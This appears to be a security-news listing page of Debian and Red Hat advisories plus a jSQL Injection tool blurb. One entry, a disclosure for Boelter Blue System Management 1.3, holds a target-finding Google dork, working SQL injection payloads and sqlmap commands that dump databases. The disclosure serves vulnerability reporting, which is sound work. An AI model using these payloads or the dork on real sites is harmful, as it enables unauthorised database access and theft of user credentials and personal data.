jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

jSQL Injection 0.98

Debian Linux Security Advisory 5706-1 - An integer overflow vulnerability in the rar e8 filter was discovered in libarchive, a multi-format archive and compression library, which may result in the execution of arbitrary code if a specially crafted RAR archive is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5706-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJune 05, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libarchiveCVE ID         : CVE-2024-26256Debian Bug     : 1072107An integer overflow vulnerability in the rar e8 filter was discovered inlibarchive, a multi-format archive and compression library, which mayresult in the execution of arbitrary code if a specially crafted RARarchive is processed.For the stable distribution (bookworm), this problem has been fixed inversion 3.6.2-1+deb12u1.We recommend that you upgrade your libarchive packages.For the detailed security status of libarchive please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/libarchiveFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmZgy+pfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0ScPRAAi2HFosqr3NeyDgV7gT3bTjKrq5EwrG9HIYS0e21KPfLteXxcsDjNkfzNnhSY0CoEL29/vyQpON+ht1En7utYtiLrSgDcjak4E26mBcMy2haL3hqMuGQiJTGkclBUQ4iHFU1SL6+KoNEgpNPIDBgDtbVDTNJUz66IUTl/QTjPvTsbUkSdSuXAvN9C9k5AEkSq4CIYl5UAQk4yJZ1MrU6pWdqPt6cpWULyaI5bIkC+fKdJ5T+2ElTnCT9VM/lkdePtI3V9iwj0vjEpelhmUlojjRUbbyuH+tDiCMUFj+GZueVvdZX1UuO4Je29vcNZ4VU6YvxU5gsgnQb09KnZd5EFGnqGNBnaEq+EEzW3Q4p2non4q6PUj8H0qzgNDMz8fxXuwdIh/8bVkmRNVQPJFurfLp5aU4ECQ4NROk3rg/sotyAjgQb6QeP2tcaxH0sKfgDc+SgcFgbUrGZ3CLanWiv19x7Oggt/I4DX/16GFSq3Z8xMzNlZOIotyr2TbKrIaPxwDrDyk8Qs2f6aPKOHZgiAIEOicpu3FP9Dr+oU9K/a8N2oDuz5Vwt4XOofN25GGZdhTTZtQ4uHBgEx1pmsWhpycdFSPUVHXW3pGoMNgIkOKau/oid73v224koBXe2eWygGE9Tnk9EDL9FtqYRbq+zTJGElcF7URbVRrxR5MVE8Ejs==BFbJ-----END PGP SIGNATURE-----

Debian Security Advisory 5706-1

Boelter Blue System Management version 1.3 suffers from a remote SQL injection vulnerability.

    Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)Google Dork: inurl:"Powered by Boelter Blue"Date: 2024-06-04Exploit Author: CBKB (DeadlyData, R4d1x)Vendor Homepage: https://www.boelterblue.comSoftware Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_USVersion: 1.3Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12CVE: CVE-2024-36840Vulnerability Details:Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.PoC:web server operating system: Linux Debian 9 (stretch)web application technology: Apache 2.4.25back-end DBMS: MySQL >= 5.0.12[22:21:39] [INFO] fetching database namesavailable databases [5]:[*] Anchor5Digital1. news_details.php?id parameter:Type: Boolean-based blindPayload: id=10071 AND 4036=4036Type: Time-based blindPayload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs2. services.php?section parameter:Type: Boolean-based blindPayload: section=(SELECT (CASE WHEN (1087=1087) THEN 5081 ELSE (SELECT 8711 UNION SELECT 5881) END))Type: Time-based blindPayload: section=5081 AND (SELECT 2101 FROM (SELECT(SLEEP(5)))nmcL)Example SQLMap Command: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs3. location_details.php?id parameter:Type: Boolean-based blindPayload: id=836 AND 4036=4036Type: Time-based blindPayload: id=836 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbsImpact:Unauthorized access to the database.Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.Account takeovers and potential full control of the affected application.Discoverer(s)/Credits:CBKB (DeadlyData, R4d1x)References:https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840

Boelter Blue System Management 1.3 SQL Injection

Debian Linux Security Advisory 5705-1 - A use-after-free was discovered in tinyproxy, a lightweight, non-caching, optionally anonymizing HTTP proxy, which could result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5705-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 05, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : tinyproxyCVE ID         : CVE-2023-49606A use-after-free was discovered in tinyproxy, a lightweight, non-caching,optionally anonymizing HTTP proxy, which could result in denial ofservice.For the stable distribution (bookworm), this problem has been fixed inversion 1.11.1-2.1+deb12u1.We recommend that you upgrade your tinyproxy packages.For the detailed security status of tinyproxy please refer toits security tracker page at:https://security-tracker.debian.org/tracker/tinyproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZgtJsACgkQEMKTtsN8TjayjxAAv/O9LSl0hdPmdVluYepX1yso5nf8Qb42rSVNPfLegsy1gr/Q1NVPJjuy471IezOPl6u/g8mg+3UquD6sRs5Q9vFc6seFWybo3TenVNNA2SMClwRAjJeuCWVWlEfAIpw0VTMpVh7cWqFuBBCOLJ0CMLXab/cXGib65L+jCxnmjTkvm3rXAfDxDec6mF0UG0vQydGS7dBfMN86udhX3KMXQPY1lctG+6r0lhBnLC79+uJPHmfC6Qup18MSbe80nB5pCc4kCk2+mbdGZ4UxnFW5sjKI40i9WAmw+7QRzunA6dgvqX6K9NINh3vrol9yWcGMNVhdaw2OY1q37tlqc2DZmv6dUD3uQJ8QN7JKVjep+uukgzk99sLkgm6WGxq815bQ1ExdFybxz+x4ixwJN5CoHlD9SjUONunPSq95wqYvkpMcmqDI2DMu3yRBOm7mOf9wePUnAFoqkQv3hUXX5VNfjnVPSYTh0ewNsj1mUv69flJBt9pmAQSuB24n5SnnK4sRIQcVo/extDxtmLSNYqrKcM8FRD0mCGBv1CqyLHnYo9fLHdGzscO3GwzFFYBoH3Z6mVBpIICctWml0Sn5H1jr7/pu9pDmfmTGlJdyteW/XJLLtwLgu23CsFGWdcwTQPn8Uw21+qoFgullC94vsyvLjvn9yzTG59A0A6f5U9wODF0==euKq-----END PGP SIGNATURE-----

Debian Security Advisory 5705-1

Red Hat Security Advisory 2024-3701-03 - An update for nghttp2 is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3701.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nghttp2 security updateAdvisory ID:        RHSA-2024:3701-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3701Issue date:         2024-06-06Revision:           03CVE Names:          CVE-2024-28182====================================================================Summary: An update for nghttp2 is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:libnghttp2 is a library implementing the Hypertext Transfer Protocol version 2 (HTTP/2) protocol in C.Security Fix(es):* nghttp2: CONTINUATION frames DoS (CVE-2024-28182,VU#421644.5)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-28182References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268639

Red Hat Security Advisory 2024-3701-03

Red Hat Security Advisory 2024-3685-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3685.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: java-1.8.0-ibm security updateAdvisory ID:        RHSA-2024:3685-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3685Issue date:         2024-06-06Revision:           03CVE Names:          CVE-2023-38264====================================================================Summary: An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.This update upgrades IBM Java SE 8 to version 8 SR8-FP15.Security Fix(es):* IBM JDK: Object Request Broker (ORB) denial of service (CVE-2023-38264)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-38264References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2279963

Red Hat Security Advisory 2024-3685-03

Debian Linux Security Advisory 5704-1 - Multiple security issues were discovered in Pillow, a Python imaging library, which could result in denial of service or the execution of arbitrary code if malformed images are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5704-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 05, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : pillowCVE ID         : CVE-2023-44271 CVE-2023-50447 CVE-2024-28219Multiple security issues were discovered in Pillow, a Python imaginglibrary, which could result in denial of service or the execution ofarbitrary code if malformed images are processed.For the oldstable distribution (bullseye), these problems have been fixedin version 8.1.2+dfsg-0.3+deb11u2.For the stable distribution (bookworm), these problems have been fixed inversion 9.4.0-1.1+deb12u1.We recommend that you upgrade your pillow packages.For the detailed security status of pillow please refer toits security tracker page at:https://security-tracker.debian.org/tracker/pillowFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZgtJUACgkQEMKTtsN8TjZpSw//Ya0Ju4SEXNXTdbLtSMkJ/Mw76ooJgrvI3GaLSarant6LcK7WzyOnjbCH9YKKPojJCyfa5RwBqphHU97dQ9apYmVRv5GVQdw7tjm+s0Uuu3oRMiE+S8c3FVBnYl6nqiTAeQnGERWAnxH2be4P6p2izWaFgK4cBHY4Q958bivB3ebGgS8DfdtuhiQo8tRdM0PREuF+xwiDb9UTRLqGGVNY+k8orkr7Imecu8IS2PakID4bnBB9AxwJ8hCCbRzNITaCh2c5BvovWNw8LADXH6mhYsnvWy0xlhDp7wrFuJBktzuXXLQuIxRkKcm0QVO65rGFI7vrTMxdtxM7ORdnUa6OMxcOwTEYeQwVcQs4k4J7M3WTtH8rz9Bgtca1DdY9foJw34bXitliJeekBibxoPbiQV+jluJAJOIvLVJ5eVeBKIowCsFmFgQbcHSbCgVA8khMMIcp4XFi3NypH2MkTJvJK+0RqchtaVmVFWoNnbamGoyr9Ml+YZbsLP22kBBXSYw9MYCm8ZPN43owNhPHxD38rSg25hJYJOjVkLHoGZYMNse74xZkEaJpyPXk5WS1QM7qYEcG1RK7a44E6xRXU4rLUfLJWCHPWsLLRTNVbKnm1EQsipbKnS4fGjc59dOD8HfNvRbwSpQ/+w9m3L/QU2F015d69UzgG1piGddGBdzLvdE==oUWM-----END PGP SIGNATURE-----

Debian Security Advisory 5704-1

Red Hat Security Advisory 2024-3671-03 - An update for the ruby:3.3 module is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3671.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: ruby:3.3 security, bug fix, and enhancement updateAdvisory ID:        RHSA-2024:3671-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3671Issue date:         2024-06-06Revision:           03CVE Names:          CVE-2024-27280====================================================================Summary: An update for the ruby:3.3 module is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.The following packages have been upgraded to a later upstream version: ruby (3.3). (RHEL-37697)Security Fix(es):* ruby: Buffer overread vulnerability in StringIO (CVE-2024-27280)* ruby: RCE vulnerability with .rdoc_options in RDoc (CVE-2024-27281)* ruby: Arbitrary memory address read vulnerability with Regex search (CVE-2024-27282)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-27280References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2270749https://bugzilla.redhat.com/show_bug.cgi?id=2270750https://bugzilla.redhat.com/show_bug.cgi?id=2276810

Red Hat Security Advisory 2024-3671-03

Red Hat Security Advisory 2024-3670-03 - An update for the ruby:3.3 module is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3670.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: ruby:3.3 security, bug fix, and enhancement updateAdvisory ID:        RHSA-2024:3670-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3670Issue date:         2024-06-06Revision:           03CVE Names:          CVE-2024-27280====================================================================Summary: An update for the ruby:3.3 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.The following packages have been upgraded to a later upstream version: ruby (3.3). (RHEL-37446)Security Fix(es):* ruby: Buffer overread vulnerability in StringIO (CVE-2024-27280)* ruby: RCE vulnerability with .rdoc_options in RDoc (CVE-2024-27281)* ruby: Arbitrary memory address read vulnerability with Regex search(CVE-2024-27282)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-27280References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2270749https://bugzilla.redhat.com/show_bug.cgi?id=2270750https://bugzilla.redhat.com/show_bug.cgi?id=2276810

Red Hat Security Advisory 2024-3670-03

Red Hat Security Advisory 2024-3669-03 - An update for less is now available for Red Hat Enterprise Linux 7. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3669.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: less security updateAdvisory ID:        RHSA-2024:3669-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:3669Issue date:         2024-06-06Revision:           03CVE Names:          CVE-2024-32487====================================================================Summary: An update for less is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impactof Important. A Common Vulnerability Scoring System (CVSS) base score, whichgives a detailed severity rating, is available for each vulnerability fromthe CVE link(s) in the References section.Description:The \"less\" utility is a text file browser that resembles \"more\", but allowsusers to move backwards in the file as well as forwards. Since \"less\" does notread the entire input file at startup, it also starts more quickly than ordinarytext editors.Security Fix(es):* less: OS command injection (CVE-2024-32487)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32487References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2274980

Tag

#linux